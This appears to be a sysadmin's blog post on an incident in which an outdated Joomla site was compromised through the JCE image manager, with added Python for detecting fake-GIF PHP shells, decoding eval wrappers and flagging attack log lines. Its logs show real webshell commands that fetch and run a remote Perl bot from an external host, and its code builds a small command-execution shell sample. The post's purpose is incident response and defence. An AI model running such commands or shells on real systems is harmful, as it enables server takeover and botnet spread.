Uploaded and executed perl script through old Joomla vulnerability

Listed in: Hacks, Linux, Internet, CMS


Being a Linux admin running multiple web servers always forcibly puts me in the game hackers vs. systems. It's an endless game without any winners.

“How art thou out of breath when thou hast breath To say to me that thou art out of breath?”
- William Shakespeare

That's definitely a quote which fits such situations. I also have to say that in the past, 99% of all hacks I've had to handle were caused by old and unpatched public content management systems, especially old Joomla installations. While the end user (who is actually responsible for installing and maintaining the application) mostly doesn't give a damn about updates, it's the sysadmin who does the work in the end.

This particular hack occurred a few weeks ago on a web server, when I received an alert about the server's load. I also checked the network traffic, and the graphs confirmed a clear anomaly:

(graphs: CPU load and network traffic)

After a few minutes I had identified the website under attack (thanks to Apache server-status and lsof) and found several recently modified/uploaded files in one of the website's subfolders, placed there through the CMS:

ls -ltr | tail
-rw-r--r-- 1 www-data www-data  182880 Mar  9  2013 red_power.jpg
-rw-r--r-- 1 www-data www-data  299881 Mar  9  2013 strandstrukturen.jpg
-rw-r--r-- 1 www-data www-data  185763 Mar  9  2013 nuts_verflssigt.jpg
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 localhost.php
-rw-r--r-- 1 www-data www-data    1515 Dec 14 22:12 iam.gif
-rw-r--r-- 1 www-data www-data    1520 Dec 19 20:08 bkht.gif
-rw-r--r-- 1 www-data www-data    1635 Jan 20 10:29 viar.gif
-rw-r--r-- 1 www-data www-data  207194 Jan 29 03:35 v.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.php
-rw-r--r-- 1 www-data www-data    1521 Jan 29 07:07 food.gif

Let's take a look at food.gif - which is supposed to be a binary file by the way:

cat food.gif
GIF89aGlobex
[...]

Yeah, that's what I expected to find. It's a "fake" GIF that merely starts with the GIF header, enough to pass a naive image check. Because the web server only hands files with a .php extension to the PHP interpreter (as long as the handler mapping is not overridden, e.g. by an .htaccess file in the upload directory), the .gif itself won't harm the system that much. More interesting was food.php, which looks like this:

cat food.php
GIF89aGlobex
[...]')))); ?>

The content of food.php is the same as food.gif (same size, same timestamp), which suggests the file was uploaded as an image to pass the upload check and then renamed or copied to a .php name. As hackers often do, the actual PHP source is obfuscated: the closing ')))); ?> shows a single encoded string wrapped in several nested decode calls (typically something like eval(gzinflate(base64_decode('...')))). Decoding all the layers reveals the real source code.

Well, this does look like a small PHP shell script: a form that lets you upload a file or run a command. Let's look at it in the browser:

(screenshot: the shell's small upload/command form)

Cute :-).
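The two things seen above, a header-only "image" carrying PHP and a shell hidden behind nested decode calls, can be triaged with a small script. The following is an added example and not code from this post: it checks files for an image signature followed by a PHP open tag, and peels eval() wrappers layer by layer using Python equivalents of PHP's decode functions. Because the real encoded string is elided above, the packed sample it builds (a two-layer eval(gzinflate(base64_decode(str_rot13('...')))) shell around a constructed command-execution payload) is an assumption about how such files are typically wrapped; the find_fake_images helper and its list of image extensions are assumptions too.

```python
"""Triage helpers for fake-image uploads and encoded PHP shells.
Added example, not code from the original post; the sample shell it
builds is constructed here and is not the attacker's real payload."""
import base64
import codecs
import os
import re
import zlib

IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")


def is_fake_image(data: bytes) -> bool:
    """True when the file opens with a real image signature but also
    contains a PHP open tag, i.e. a header-only 'image' like food.gif."""
    return data.startswith(IMAGE_MAGIC) and (b"<?php" in data or b"<?=" in data)


def find_fake_images(root: str, exts=(".gif", ".jpg", ".jpeg", ".png")):
    """Walk an upload directory (assumed layout) and return image files carrying PHP."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    if is_fake_image(fh.read()):
                        hits.append(path)
    return hits


# PHP decode functions commonly stacked around a webshell, and their Python
# equivalents. PHP's gzinflate() is raw DEFLATE (no zlib header): wbits=-15.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# Matches eval(f1(f2(f3('...')))) and captures the wrapper chain and the literal.
WRAPPER_RE = re.compile(r"""eval\s*\(\s*((?:\w+\s*\(\s*)+)(['"])(.*?)\2\s*\)+\s*;?""", re.S)


def unwrap_once(php: str):
    """Peel one eval(...) layer; returns the decoded inner code, or None if there is none."""
    m = WRAPPER_RE.search(php)
    if not m:
        return None
    funcs = re.findall(r"\w+", m.group(1))      # outermost wrapper first
    payload = m.group(3).encode("latin-1")
    for fn in reversed(funcs):                  # the innermost function runs first
        if fn not in DECODERS:
            raise ValueError(f"unsupported wrapper function: {fn}()")
        payload = DECODERS[fn](payload)
    return payload.decode("latin-1")


def unwrap(php: str, max_layers: int = 20):
    """Keep peeling until no eval() wrapper is left. Returns (source, layers_peeled)."""
    layers = 0
    while layers < max_layers:
        inner = unwrap_once(php)
        if inner is None:
            break
        php, layers = inner, layers + 1
    return php, layers


# --- constructed sample, packed the way such shells typically are (assumption) ---
FINAL_SOURCE = "if (isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); }"


def wrap(code: str) -> str:
    """Pack code as eval(gzinflate(base64_decode(str_rot13('...'))));"""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)             # raw DEFLATE = gzinflate input
    raw = co.compress(code.encode("latin-1")) + co.flush()
    b64 = base64.b64encode(raw).decode("ascii")
    return "eval(gzinflate(base64_decode(str_rot13('%s'))));" % codecs.encode(b64, "rot_13")


def build_sample() -> bytes:
    """A fake GIF carrying a two-layer encoded shell, in the style of food.gif/food.php."""
    return b"GIF89aGlobex\n<?php " + wrap(wrap(FINAL_SOURCE)).encode("latin-1") + b" ?>"


if __name__ == "__main__":
    sample = build_sample()
    print("fake image:", is_fake_image(sample))
    source, depth = unwrap(sample.decode("latin-1"))
    print(f"{depth} layers peeled ->", source)
```

Point find_fake_images at the upload directory of the site (Joomla's images/stories in this case) to list every image that is really PHP. The decoder refuses wrapper functions it does not know instead of guessing; extend DECODERS (urldecode, hex2bin, ...) when a sample needs it, rather than feeding the file to PHP to see what it does.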
The steps that followed caused the huge load.
The attacker didn't just run a few commands. No. Through this form, the attacker downloaded a remote Perl script and executed it, trying several download tools in turn (curl, wget, fetch, lwp-download) so that at least one would exist on the target. The POST requests right before that target the image manager of the JCE editor component (com_jce), which is how the shell got uploaded in the first place:

27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:55 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:07:54 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 200 50 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:11 +0100] "GET /images/stories/food.php?cmd=wget++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:12 +0100] "GET /images/stories/food.php?cmd=fetch++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:13 +0100] "GET /images/stories/food.php?cmd=lwp-download++http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
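The log excerpt above is a textbook sequence: JCE image-manager POSTs from a scanner with its own user agent, then GETs to a PHP file under the image upload directory with a cmd= parameter carrying a download-and-execute chain. As an added example (not from the original post), here is detection logic over such lines. It parses Apache combined-format entries and flags the JCE probes, PHP requested from the upload directory, and cmd= values that chain a downloader with an interpreter. The upload directory path, the downloader/interpreter lists and the finding names are my assumptions; the first three sample lines are copied from the excerpt above, the fourth is a constructed benign request from a TEST-NET address.

```python
"""Detection logic for the JCE probe + webshell command pattern in the log above.
Added example, not part of the original post."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')

# Assumptions: Joomla's default image upload directory, and the download and
# interpreter binaries an attacker cycles through ("curl, else wget, else fetch ...").
UPLOAD_DIR = "/images/stories/"
DOWNLOADERS = {"curl", "wget", "fetch", "lwp-download", "lynx", "links"}
INTERPRETERS = {"perl", "python", "python3", "php", "sh", "bash", "ruby"}
URL_RE = re.compile(r"""https?://[^\s;|&'"]+""")


def classify(entry: dict) -> dict:
    """Return the findings for one parsed log entry."""
    parts = urlsplit(entry["url"])
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings, urls = [], []
    if qs.get("option") == ["com_jce"] and qs.get("plugin") == ["imgmanager"]:
        findings.append("jce-imgmanager")
    if "BOT for JCE" in entry["ua"]:
        findings.append("jce-bot-ua")
    if parts.path.startswith(UPLOAD_DIR) and parts.path.lower().endswith(".php"):
        findings.append("php-in-upload-dir")
    for cmd in qs.get("cmd", []):
        # parse_qs already turned '+' into spaces and %3B into ';'. Split the
        # command chain and look at the first word of every segment.
        argv0 = {seg.split()[0] for seg in re.split(r"[;|&]+", cmd) if seg.split()}
        if argv0 & DOWNLOADERS and argv0 & INTERPRETERS:
            findings.append("download-and-execute")
        elif argv0:
            findings.append("remote-command")
        urls.extend(URL_RE.findall(cmd))        # where the payload was fetched from
    return {"ip": entry["ip"], "ts": entry["ts"], "path": parts.path,
            "findings": findings, "urls": urls}


def analyze(lines):
    """Parse combined-format lines and return only the entries with findings."""
    results = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue                            # not combined format; skip it
        r = classify(m.groupdict())
        if r["findings"]:
            results.append(r)
    return results


# Three lines from the excerpt above plus one constructed benign request.
SAMPLE_LOG = r'''
27.111.90.4 - - [29/Jan/2014:07:07:51 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 200 36 "-" "BOT/0.1 (BOT for JCE)"
27.111.90.4 - - [29/Jan/2014:07:08:08 +0100] "GET /images/stories/food.php?rf HTTP/1.1" 200 2455 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
27.111.90.4 - - [29/Jan/2014:07:08:10 +0100] "GET /images/stories/food.php?cmd=curl+-C+-+-O+http://www.vigap.com.mx/wp-content/themes/delegate/lang/robot.log%3Bperl+robot.log%3Brm+robot.log HTTP/1.1" 200 851 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.0.2.10 - - [29/Jan/2014:07:09:00 +0100] "GET /images/stories/red_power.jpg HTTP/1.1" 200 182880 "-" "Mozilla/5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["path"], ",".join(hit["findings"]), hit["urls"])
```

The same rules translate directly into a grep, fail2ban or mod_security pattern. The parse_qs step matters: the cmd= payload arrives with + for spaces and %3B for semicolons, so matching a literal "perl robot.log" in the raw line would miss it, while decoding first lets one rule catch curl, wget, fetch and lwp-download variants alike.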

I manually fetched the URL the Perl bot was downloaded from, and this is what the bot script looked like:

(screenshot: the Perl bot's source)

On the system, several hundred processes named "/usr/sbin/httpd" had been launched (obviously the process name was faked; they were instances of the Perl bot). Each bot instance attacked several other websites on the Internet, trying to do exactly the same thing again: find a vulnerable Joomla install and hack it.
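The fake "/usr/sbin/httpd" processes can be unmasked from /proc. Added example, not from the post: a Perl script can rewrite its own argv (by assigning to $0), and that rewritten argv is what ps and /proc/<pid>/cmdline display, but /proc/<pid>/exe still links to the binary that is actually executing, in this case the Perl interpreter. The script compares the two for every process it is allowed to inspect. The interpreter name list and the handling of versioned binary names (perl5.34, python3.11) are my assumptions.

```python
"""Find processes whose argv[0] claims one program while an interpreter is
really running, e.g. a Perl bot calling itself /usr/sbin/httpd.
Added example, not code from the original post."""
import os
import re

# Interpreters a bot is typically run with; versioned names (perl5.34, python3.11)
# are accepted as well. This list is an assumption.
INTERP_RE = re.compile(r"^(perl|python|php|ruby|bash|dash|zsh|sh)[0-9.]*$")


def is_impostor(cmdline: bytes, exe: str) -> bool:
    """True if argv[0] (from /proc/<pid>/cmdline) does not match the interpreter
    that /proc/<pid>/exe says is running."""
    if exe.endswith(" (deleted)"):          # binary removed after start; keep the path
        exe = exe[:-len(" (deleted)")]
    claimed = os.path.basename(cmdline.split(b"\0", 1)[0].decode("utf-8", "replace"))
    claimed = claimed.lstrip("-")            # login shells show up as "-bash"
    real = os.path.basename(exe)
    if not INTERP_RE.match(real):
        return False                         # compiled binaries are out of scope here
    return not real.startswith(claimed)      # "python3" claiming to be python3.11 is fine


def find_impostors(proc="/proc"):
    """Scan /proc and return (pid, claimed name, real exe) for suspicious processes."""
    hits = []
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(f"{proc}/{pid}/cmdline", "rb") as fh:
                cmdline = fh.read()
            exe = os.readlink(f"{proc}/{pid}/exe")
        except OSError:                      # process exited, or not ours to inspect
            continue
        if cmdline and is_impostor(cmdline, exe):
            claimed = cmdline.split(b"\0", 1)[0].decode("utf-8", "replace")
            hits.append((int(pid), claimed, exe))
    return hits


if __name__ == "__main__":
    for pid, claimed, exe in find_impostors():
        print(f"pid {pid}: claims to be {claimed!r} but runs {exe}")
```

Run it as root; other users' /proc/<pid>/exe links are not readable otherwise. It deliberately looks only at interpreters: a bot shipped as a compiled binary named httpd would need a different check, such as comparing the exe path against the real web server's install location. And killing the hits is only half the job; the dropped shell that respawns them has to go as well, which is why disabling the site was what finally calmed the server down.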

Once I disabled the hacked site, things calmed down again. And once again, the site responsible was running this (from Joomla's version.php: Joomla 1.5.15, released on 5 November 2009, i.e. more than four years old at the time of the hack):

        var $RELEASE    = '1.5';
        /** @var string Development Status */
        var $DEV_STATUS = 'Stable';
        /** @var int Sub Release Level */
        var $DEV_LEVEL  = '15';
        /** @var int build Number */
        var $BUILD      = '';
        /** @var string Codename */
        var $CODENAME   = 'Wojmamni Ama Mamni';
        /** @var string Date */
        var $RELDATE    = '05-November-2009';

Honestly, I can't blame the hackers. There are so many pseudo-webmasters out there who install a CMS once and then never take care of it again; it's just too easy to hack.

